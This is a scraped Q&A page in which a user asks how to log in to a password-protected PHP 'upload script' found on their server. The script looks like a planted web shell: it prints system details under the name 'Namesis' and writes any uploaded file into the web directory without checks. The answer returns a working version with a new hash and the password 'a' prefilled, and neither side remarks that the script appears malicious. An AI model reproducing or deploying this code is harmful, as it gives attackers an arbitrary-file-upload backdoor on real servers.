stackoom
  简体   繁体   中英

Enter the right password to login php

 原文  2016-10-08 08:37:10       php/ upload/ passwords

Question

I have a PHP script on Linux server and I can just display it on the browser and this script tell me that I must enter the password to logon (upload script). This is the PHP code:

<?php
    session_start();
    if($_SESSION["adm"]){
        echo '<b>Namesis<br><br>'.php_uname().'<br></b>';
        echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
        echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
        if( $_POST['_upl'] == "Upload" ) {  
            if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
                echo '<b>Upload Success !!!</b><br><br>'; 
            } else { 
                echo '<b>Upload Fail !!!</b><br><br>'; 
            }
        }
    }
    if($_POST["p"]) {
        $p = $_POST["p"];
        $pa = md5(sha1($p));
        if($pa=="0cc175b9c0f1b6a831c399e269772661") {
            $_SESSION["adm"] = 1;
        }
    }
?>

<form action="" method="post">
<input type="text" name="p">
</form>

I see that the password is md5; when I decrypt this 0cc175b9c0f1b6a831c399e269772661 I find the result is "`a`" but when I enter the "`a`" password the script doesn't login successfully. I have tried to upload.php?p=a and upload.pph?p=0cc175b9c0f1b6a831c399e269772661 and nothing changed.

Please how can I login in this script. I'm worried.

1 answers

solution1
 0  2016-10-08 08:55:34

Try this: Here you have use not only md5() but also sha1() so decrypted 'a' will be 77de54ccf56eb6f7dbf99e4d3be949ab .Thanks

<?php
session_start();
if(isset($_SESSION["adm"]) && $_SESSION["adm"]==1){
    echo '<b>Namesis :'.php_uname().'<br></b><br>';
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

    if(isset($_POST['_upl']) &&  $_POST['_upl']== "Upload" ) {  
        if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { 
            echo '<b>Upload Success !!!</b><br><br>'; 
        }else { 
            echo '<b>Upload Fail !!!</b><br><br>'; 
        }
    }
}
if(isset($_POST["p"])){
    $p = $_POST["p"];
    $pa = md5(sha1($p));
    if($pa=="77de54ccf56eb6f7dbf99e4d3be949ab"){
        $_SESSION["adm"] = 1;
    }
}
?>
<form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>" method="post">
    <input type="text" name="p" value="a">
    <input type="submit" value="submit">
</form>

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Cant login with the right password in PHP PDO php login not working even if i enter the correct email and password PhpPgAdmin asks enter login and password php login, i can login even i enter uppercased password or vice versa login with hash password php PHP login password question PHP Login (Password) Validation PHP Login with Username/Password password/login system in php PHP. Enter password to click button
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM